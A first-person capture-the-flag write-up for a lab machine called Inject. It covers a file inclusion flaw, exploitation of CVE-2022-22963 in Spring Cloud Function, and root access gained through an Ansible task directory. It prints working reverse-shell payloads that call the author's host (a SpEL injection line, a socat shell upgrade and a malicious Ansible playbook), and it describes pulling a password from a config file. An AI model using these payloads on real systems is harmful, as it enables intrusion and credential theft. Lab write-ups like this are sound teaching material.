# Inject write-up 
_April 2023_

**Spoilers ahead!**

i started by running the usual scans.
```bash
rustscan -a 10.10.11.204 
```
```
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack
8080/tcp open  http-proxy syn-ack
```

I noticed there was an http service running on port 8080, and so i navigated to it using the browser.

Most of the website features, such as the login and signup, did not work.

There was an upload button on top of the initial page, which lead to a page where one could choose a file to upload.

![uploaded_file.png](uploaded_file.png)

I began by trying to add a `.txt` file.
The website rejected it and responded that it only accepted image files.

I tried uploading an image and, after uploading, I was given the option to see it.

Next, I tried to upload a non-image file and change its content type using Burp Suite to `image/png`, but the backend still rejected the file.

Then I noticed that the url had a local file inclusion I could exploit.
Even though the output did not show on the browser, it showed on Burp Suite!

![found_LFI.png](found_LFI.png)

Then I found that I did not even need to specify a file, since the url would list all files within a directory if given a directory!

By checking `/etc/passwd` I noticed there was an user called "phil".
I tried to use the LFI to get the user flag, (located in `/home/phil/user.txt`) but it did not work.

From playing around I got some Internal Server Error pages, and using wappalyzer I realised that the backend was using PHP.

I found that the uploaded files were stored in the path `/var/www/WebApp/src/main/uploads`.

At this point I got stuck, and thinking there would be a PHP injection, I tried messing with the file upload for a long time.
I tried both messing with the upload requests and the files' metadata, using exiftool.
None of these worked.

After a while I changed my approach.
I snooped around the files on the machine.

It took me some time but eventually I found `/var/www/WebApp/pom.xml`, which listed the dependencies and the software versions of the WebApp.

After a little bit of googling one dependency that was vulnerable and which I could exploit.
```xml
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-web</artifactId>
    <version>3.2.2</version>
</dependency>
```

The machine is vulnerable to CVE-2022-22963.
[This means it allows using the HTTP request header `spring.cloud.function.routing-expression` parameter and SpEL expression to be injected and executed through `StandardEvaluationContext`.](https://sysdig.com/blog/cve-2022-22963-spring-cloud/)

I initially adapted [the zero-day proof-of-concept](https://github.com/hktalent/spring-spel-0day-poc#poc1) to ping my machine and check using `tcpdump` if I received anything, so that I knew the PoC was working.
This did not work, so I tried to catch an http GET request instead, and I was able to confirm I had remote code execution.

![poc_exploit.png](poc_exploit.png)

![got_http_request.png](got_http_request.png)

Knowing this, I adapted the PoC to spawn a reverse shell instead.
After trying a few reverse shells, I adapted the Java reverse shell from [revshells](https://revshells.com) and it worked.
```
T(java.lang.Runtime).getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/10.10.16.88/8000 0>&1")
```

![got_reverse_shell.png](got_reverse_shell.png)

The spawned reverse shell was from user `frank`.
However, the flag was on the home directory of user `phil`.

I began by upgrading my shell to an interactive shell.
I sent a socat static binary to the machine using wget and a Python server.
I then upgraded it using socat.
```bash
# On my machine
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
sudo python -m http.server 80 

# On target machine
wget http://10.10.16.88/socat
chmod +x socat

# On my machine
socat file:`tty`,raw,echo=0 tcp-listen:4444

# On target machine
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.88:4444

# On the spawned shell
export TERM=xterm-256color # to change to my TERM
```

Having this new shell, I snooped around the files on the home directory.
Eventually, among the hidden files, I found `/home/frank/.m2/settings.xml`, which contained the password for user `phil`.

I ran `su phil` to change user and got the user flag.

----
### Root flag

I started by sending [`linpeas.sh`](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) to the target machine and running it, similarly to what I had done with `socat`.
However, I did not find anything helpful with it.

I also tried to check the user sudo capabilities with `sudo -l`, but the user was not allowed to run sudo at all on localhost.

I checked if the user had any interesting crontab processes with  `crontab -l` but nothing came of it either.

Finally, I sent a [`pspy` binary](https://github.com/DominicBreuker/pspy/blob/master/README.md) to the machine, to check if there were any background processes being run by root that I could exploit.

[Knowing that the root UID is always set to 0](https://www.redhat.com/sysadmin/user-account-gid-uid), I found the following interesting processes running on the background.
```
2023/04/08 12:14:01 CMD: UID=0     PID=87960  | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml 
2023/04/08 12:14:01 CMD: UID=0     PID=87958  | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml 
2023/04/08 12:14:01 CMD: UID=0     PID=87963  | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/ 
2023/04/08 12:14:01 CMD: UID=0     PID=87964  | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml 
```
It seemed that there was a routine to run all files inside `/opt/automation/tasks/` using ansible every few seconds, deleting them, and copy `playbook_1.yml` back into the directory.
[I searched the web for an ansible reverse shell](https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/), and put it inside a file inside the directory.
```ansible
- hosts: localhost
  tasks:
  - name: rev
    shell: bash -c 'bash -i >& /dev/tcp/10.10.16.88/443 0>&1'
```

I left a netcat instance listening for a few seconds and got the root shell!

![got_root_shell.png](got_root_shell.png)

The flag was inside `/root/root.txt`.

